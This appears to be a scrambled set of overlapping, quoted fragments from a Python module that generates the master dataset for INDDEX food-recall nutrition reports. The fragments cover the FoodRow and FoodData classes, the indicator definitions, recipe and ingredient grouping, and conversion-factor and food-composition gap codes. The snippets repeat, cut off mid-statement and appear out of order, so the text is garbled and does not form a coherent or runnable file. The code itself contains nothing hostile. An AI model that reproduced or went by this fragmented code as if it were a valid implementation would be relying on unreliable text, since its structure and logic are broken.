"eating a nonstandard recipe more than once, in which case subsequent references point",
"the logic to generate the master dataset for the INDDEX reports Overview --------",
"separate rows in the report. Standard recipes have their ingredients enumerated in the",
"a nonstandard recipe more than once, in which case subsequent references point to",
"= ingredient.ingr_fraction def _set_composition(self): # Get the food composition corresponding to food_code, fall",
"False food_groups = self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False",
"file contains the logic to generate the master dataset for the INDDEX reports",
"indicator in the UCR that hasn't been explicitly set, return that val return",
"row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them",
"= row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe",
"res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row",
"'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v in filter_selections.items()",
"# Get the food composition corresponding to food_code, fall back to base_term_food_code fct",
"IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements',",
"I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG =",
"I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i",
":: This is the interface to this dataset, it glues together all the",
"EMWF.show_project_data(slugs): return [] # don't filter by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive()",
"= {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking',",
"return self.ucr_row[indicator.slug] return None else: # If it's an indicator in the UCR",
"return False food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return",
"IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient',",
"master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield",
"IN_UCR, IS_RECALL_META), I('age_years_calculated', IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META),",
"in the \"recipes\" lookup table. This dataset has additional rows inserted for each",
"I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE),",
"return res else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid]",
"ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {}",
"table. This dataset has additional rows inserted for each ingredient. These rows are",
".domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap",
"for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k !=",
"= 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the recipe",
"fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code' elif",
"i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking',",
"for col in NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row,",
"reduce(operator.mul, args) except TypeError: return None def _maybe_float(val): return float(val) if val not",
"self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code))",
"defined by the user and beneficiary during a recall session. The ingredients of",
"= defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row in",
"references are missing some values, insert them from the master recipe nsr_cols =",
"I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking',",
"in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code",
"for row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else:",
"recipe by `recipe_case_id`. Beneficiaries may report eating a nonstandard recipe more than once,",
"IN_UCR), I('conv_option_desc', IN_UCR), I('measurement_amount', IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR),",
"return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's",
"dataset for INDDEX reports. See file docstring for more.\"\"\" IN_MEMORY_FILTERS = ['gap_type', 'fao_who_gift_food_group_code',",
"self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id']",
"https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META),",
"_multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid] = recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total,",
"recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe ingredients come",
"self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code",
"self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property def age_range(self): if",
"NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: #",
"of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code ==",
"slug in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate),",
"else: # If it's an indicator in the UCR that hasn't been explicitly",
"recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows",
"and don't enumerate the ingredients again. We need to insert duplicates of the",
"or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and",
"rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients':",
"recipes, and their ingredients appear as separate rows in the report. Standard recipes",
"I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on',",
"= ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code,",
"IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR),",
"in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid",
"self.slug = slug tags = set(tags) self.in_ucr = IN_UCR in tags self.in_food_fixture =",
"I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i",
"self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if",
"ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient)",
"FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug",
"again. We need to insert duplicates of the previously reported ingredients into the",
"NSR_COLS_TO_COPY: # Copy these values from the recipe case setattr(row, col, getattr(recipe, col))",
"enumerate the ingredients again. We need to insert duplicates of the previously reported",
"the report. Standard recipes have their ingredients enumerated in the \"recipes\" lookup table.",
"their ingredients enumerated in the \"recipes\" lookup table. This dataset has additional rows",
"getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name)",
"than once, in which case subsequent references point to the recipe definition with",
"def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures =",
"every food, with metadata about the recall session, calculated nutritional information, and auditing",
"NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions,",
"of the recipe are entered as additional food cases and linked to the",
"been explicitly set, check if it can # be pulled from the food",
"<= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return",
"for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These",
"_maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False def _set_ingredient_fields(self, ingredient): if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code",
"res = {} for row in ingredients: res[row.uuid] = _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction)",
"the parent food case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return",
"age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code:",
"return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {}",
"be pulled from the food fixture or from the parent food case's UCR",
"This dataset has a row for every food, with metadata about the recall",
"in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self,",
"a row for every food, with metadata about the recall session, calculated nutritional",
"self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap()",
"val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition for",
"+ ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe =",
"rows aren't part of a recipe, or it wasn't found\"\"\" for raw_row in",
"try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None",
"food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may report eating",
"in the UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug]",
"IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code',",
"request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] #",
"= group['recipe'] references = group['references'] ingredients = group['ingredients'] if not master_recipe: yield from",
"= bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct)",
"get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01)",
"import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, )",
"references point to the recipe definition with already_reported_recipe_case_id and don't enumerate the ingredients",
"amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return",
"has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX",
"def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them from",
"self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if",
"ConvFactorGaps.AVAILABLE: return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False",
"def rows(self): rows = [] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return",
"raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside the",
"IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR,",
"self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name = recipe.ucr_row['recipe_name']",
"not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows",
"IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR),",
"True yield row def _insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values,",
"IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block',",
"I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META),",
"explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow",
"= 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used = 'base_term_food_code'",
"self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used == 'food_code' and self.reference_food_code: self.fct_data_used",
"I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR,",
"rows inserted for each ingredient. These rows are associated with the recipe case,",
"in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name: self.base_term_food_code",
"'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code",
"if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will",
"\"\"\" This file contains the logic to generate the master dataset for the",
"import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta' CALCULATED_LATER =",
"that's a child of this foodrecall. This dataset has a row for every",
"in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case rows grouped",
"self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) <",
"is or isn't available. Some of these foods are recipes, and their ingredients",
"(user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If",
"ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code =",
"self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k,",
"if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] = row elif",
"v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request):",
"for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE",
"self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount =",
"res else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try:",
"I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code',",
"Components ---------- FoodData :: This is the interface to this dataset, it glues",
"all(i.fct_gap_code == FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code =",
"case's UCR if indicator.in_food_fixture: return getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None",
"recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for",
"class I: def __init__(self, slug, *tags): self.slug = slug tags = set(tags) self.in_ucr",
"row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid]",
"AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR =",
"of a \"food\" case that's a child of this foodrecall. This dataset has",
"calculated nutritional information, and auditing columns reporting on what data is or isn't",
"additional food cases and linked to the recipe by `recipe_case_id`. Beneficiaries may report",
"set_fct_gap(self, ingredients=None): if ingredients: for row in ingredients: row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if",
"[v for v in request.GET.getlist(k) if v] for k in cls.FILTERABLE_COLUMNS if k",
":: Class responsible for row-wise calculations and indicator definitions. \"\"\" import operator import",
"in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in tags #",
"food_types = self._in_memory_filter_selections.get('food_type') if food_types and row.food_type not in food_types: return False food_groups",
"tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later =",
"IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time',",
"IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META),",
"if not master_recipe: yield from self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients)",
"= group['references'] ingredients = group['ingredients'] if not master_recipe: yield from self._non_recipe_rows(references + ingredients)",
"is the interface to this dataset, it glues together all the component pieces",
"self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code = ucr_row['food_code'] if not self.food_code and self.food_name",
"__init__(self, domain, *, datespan, filter_selections): for slug in filter_selections: if slug not in",
"filter_selections): for slug in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is",
"insert duplicates of the previously reported ingredients into the report for them. Components",
"from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data",
"IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR,",
"to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and",
"definitions. \"\"\" import operator import uuid from collections import defaultdict from functools import",
"'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row",
"not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and",
"age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self, age_range.column) < age_range.upper_bound: return age_range.name def",
"import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data import FoodCaseData from",
"self.fct_code = self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used =",
"recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: #",
"dataset, it glues together all the component pieces and presents the result as",
"from the food fixture or from the parent food case's UCR if indicator.in_food_fixture:",
"getattr(self.fixtures.foods[self.food_code], indicator.slug) if indicator.is_recall_meta: return self.ucr_row[indicator.slug] return None else: # If it's an",
"I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'), I('fct_base_term_food_code_exists'), I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code',",
"return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if",
"by owner if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs)",
"nonstandard recipe more than once, in which case subsequent references point to the",
"I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'),",
"IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR),",
"row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id =",
"fct = self.fixtures.food_compositions self.fct_food_code_exists = bool(self.food_code and self.food_code in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code",
"total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values",
"IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections): for slug in filter_selections:",
"_insert_nsr_cols(raw_recipe, master_recipe): # nsr references are missing some values, insert them from the",
"I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR), I('conv_method_code', IN_UCR), I('conv_method_desc', IN_UCR), I('conv_option_code', IN_UCR), I('conv_option_desc', IN_UCR),",
"ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: #",
"show only rows with gaps of that type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type",
"portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None",
"and beneficiary during a recall session. The ingredients of the recipe are entered",
"that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has no definition",
"IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR), I('tag_3', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_3',",
"self.food_code self.fct_data_used = 'food_code' elif self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if",
"I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2',",
"nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe,",
"the creation of a \"food\" case that's a child of this foodrecall. This",
"== STANDARD_RECIPE: row.ingredient_type = 'std_recipe_ingredient' row.ingr_recipe_total_grams_consumed = total_grams[recipe.uuid] else: row.ingredient_type = 'non_std_recipe_ingredient' for",
"= _multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None",
"( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR",
"if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if",
"= 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the",
"self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount",
"with metadata about the recall session, calculated nutritional information, and auditing columns reporting",
"name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete:",
"ucr_row['food_code'] if not self.food_code and self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not",
"yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type ==",
"a unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator definitions.",
"return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): #",
"self.food_name in self.fixtures.foods_by_name: self.food_code = self.fixtures.foods_by_name[self.food_name].food_code if not self.base_term_food_code and self.food_base_term in self.fixtures.foods_by_name:",
"generate the master dataset for the INDDEX reports Overview -------- Beneficiaries are asked",
"the \"recipes\" lookup table. This dataset has additional rows inserted for each ingredient.",
"self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and",
"not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug]",
"operator import uuid from collections import defaultdict from functools import reduce from memoized",
"self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE):",
"= len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if",
"here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id',",
